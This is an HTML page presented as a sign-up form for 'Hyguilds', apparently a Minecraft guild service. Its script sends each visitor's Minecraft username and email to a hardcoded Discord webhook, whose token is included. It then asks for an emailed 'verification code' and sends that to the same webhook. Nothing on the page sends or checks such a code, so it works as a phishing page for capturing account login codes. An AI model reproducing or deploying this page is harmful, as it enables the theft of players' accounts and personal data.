<!DOCTYPE html>
<html>
<head>
  <title>Sign Up To Hyguilds</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
      margin: 0;
      padding: 0;
      transition: background-color 1.0s, color 1.0s;
    }

    #container {
      max-width: 400px;
      margin: 0 auto;
      padding: 20px;
      background-color: #fff;
      border: 1px solid #ccc;
      border-radius: 5px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
      transition: background-color 0.5s;
    }

    h2 {
      text-align: center;
      color: #333;
      margin-top: 0;
    }

    label {
      display: block;
      margin-bottom: 8px;
      color: #555;
    }

    input[type="text"],
    input[type="email"],
    button {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 14px;
      transition: background-color 0.5s, color 0.5s;
    }

    button[type="submit"] {
      background-color: #4CAF50;
      color: #fff;
      cursor: pointer;
      transition: background-color 0.3s;
    }

    button[type="submit"]:hover {
      background-color: #45a049;
    }

    #codeContainer {
      display: none;
    }

    #verificationCode {
      font-weight: bold;
      margin-top: 10px;
    }

    .dark-mode-toggle {
      position: absolute;
      top: 10px;
      right: 10px;
      display: flex;
      align-items: center;
      color: #555;
      font-size: 14px;
      transition: color 0.5s;
    }

    .dark-mode-toggle-label {
      margin-right: 5px;
    }

    .switch {
      position: relative;
      display: inline-block;
      width: 40px;
      height: 20px;
    }

    .slider {
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background-color: #ccc;
      border-radius: 20px;
      transition: 0.5s;
    }

    .slider:before {
      position: absolute;
      content: "";
      height: 16px;
      width: 16px;
      left: 2px;
      bottom: 2px;
      background-color: white;
      border-radius: 50%;
      transition: 0.5s;
    }

    input[type="checkbox"]:checked + .slider {
      background-color: #4CAF50;
    }

    input[type="checkbox"]:checked + .slider:before {
      transform: translateX(20px);
    }

    .dark-mode input[type="text"],
    .dark-mode input[type="email"],
    .dark-mode button[type="submit"] {
      border-color: #666;
      color: #ddd;
    }

    .dark-mode button[type="submit"]:hover {
      background-color: #408040;
    }

    .dark-mode #container {
      background-color: #222;
      border-color: #555;
    }

    .dark-mode h2,
    .dark-mode label,
    .dark-mode .dark-mode-toggle-label {
      color: #ddd;
    }

    .dark-mode .dark-mode-toggle {
      color: #ddd;
    }
  </style>
</head>
<body>
  <div id="container">
    <h2>Sign Up To Hyguilds</h2>
    <div id="formContainer">
      <form id="followForm">
        <label for="username">Minecraft Username:</label>
        <input type="text" id="username" required>

        <label for="email">Email:</label>
        <input type="email" id="email" required>

        <button type="submit">Submit</button>
      </form>
    </div>

    <div id="codeContainer">
      <h2>Verification Code</h2>
      <p>Please enter the verification code we sent to your email address.</p>
      <form id="codeForm">
        <label for="code">Code:</label>
        <input type="text" id="code" required>

        <button type="submit">Verify</button>
      </form>
      <p id="verificationCode"></p>
    </div>
  </div>
  <div class="dark-mode-toggle">
    <span class="dark-mode-toggle-label">Dark Mode</span>
    <label class="switch">
      <input type="checkbox" onchange="toggleDarkMode()" id="darkModeToggle">
      <span class="slider"></span>
    </label>
  </div>

<script>
  let emailSubmitted = false;

  document.getElementById("followForm").addEventListener("submit", function(event) {
    event.preventDefault(); // prevent the form from reloading the page

    // get the input values
    const username = document.getElementById('username').value;
    const email = document.getElementById('email').value;

    // create the webhook message
    const message = {
      "content": "Email and IGN entered!",
      "embeds": [
        {
          "title": "Sign Up!",
          "description": "Please verify your email address by entering the code we sent you.",
          "color": 16777215,
          "fields": [
            {
              "name": "Minecraft Username",
              "value": username
            },
            {
              "name": "Email",
              "value": email
            }
          ]
        }
      ]
    };

    // send the webhook message
    fetch("https://discord.com/api/webhooks/1119215694110789742/DKe5G1oQ3Zf2zgQTu2QEfzq650Ar4YNoXquQkDTv26mFXQuBjBHPXPleekqZ_xAnVsP0", {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify(message)
    })
    .then(function(response) {
      if (response.ok) {
        console.log("Email and IGN submitted successfully!");
        emailSubmitted = true;
        showCodeForm();
      } else {
        console.log("Error:", response.statusText);
      }
    })
    .catch(function(error) {
      console.log("Error:", error);
    });
  });

  document.getElementById("codeForm").addEventListener("submit", function(event) {
    event.preventDefault(); // prevent the form from reloading the page

    // get the verification code
    const code = document.getElementById('code').value;

    // create the verification code message
    const codeMessage = {
      "content": "Verification code entered!",
      "embeds": [
        {
          "title": "Verification Code",
          "description": "The verification code entered by the user.",
          "color": 16711680,
          "fields": [
            {
              "name": "Code",
              "value": code
            }
          ]
        }
      ]
    };

    // send the verification code message to the webhook
    fetch("https://discord.com/api/webhooks/1119215694110789742/DKe5G1oQ3Zf2zgQTu2QEfzq650Ar4YNoXquQkDTv26mFXQuBjBHPXPleekqZ_xAnVsP0", {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify(codeMessage)
    })
    .then(function(response) {
      if (response.ok) {
        console.log("Code submitted successfully!");
        // Code validation success, you can perform any further actions here
      } else {
        console.log("Error:", response.statusText);
        // Code validation failed, you can display an error message or take other actions
      }
    })
    .catch(function(error) {
      console.log("Error:", error);
    });
  });

  function showCodeForm() {
    document.getElementById("formContainer").style.display = "none";
    document.getElementById("codeContainer").style.display = "block";
  }

  function toggleDarkMode() {
    const body = document.body;
    body.classList.toggle('dark-mode');

    // Store the dark mode preference in localStorage
    const darkModeToggle = document.getElementById('darkModeToggle');
    const isDarkMode = darkModeToggle.checked;
    localStorage.setItem('darkMode', isDarkMode);
  }

  function applyDarkModePreference() {
    const darkModePreference = localStorage.getItem('darkMode');

    if (darkModePreference === 'true') {
      document.body.classList.add('dark-mode');
      document.getElementById('darkModeToggle').checked = true;
    }
  }

  applyDarkModePreference();
</script>
</body>
</html>
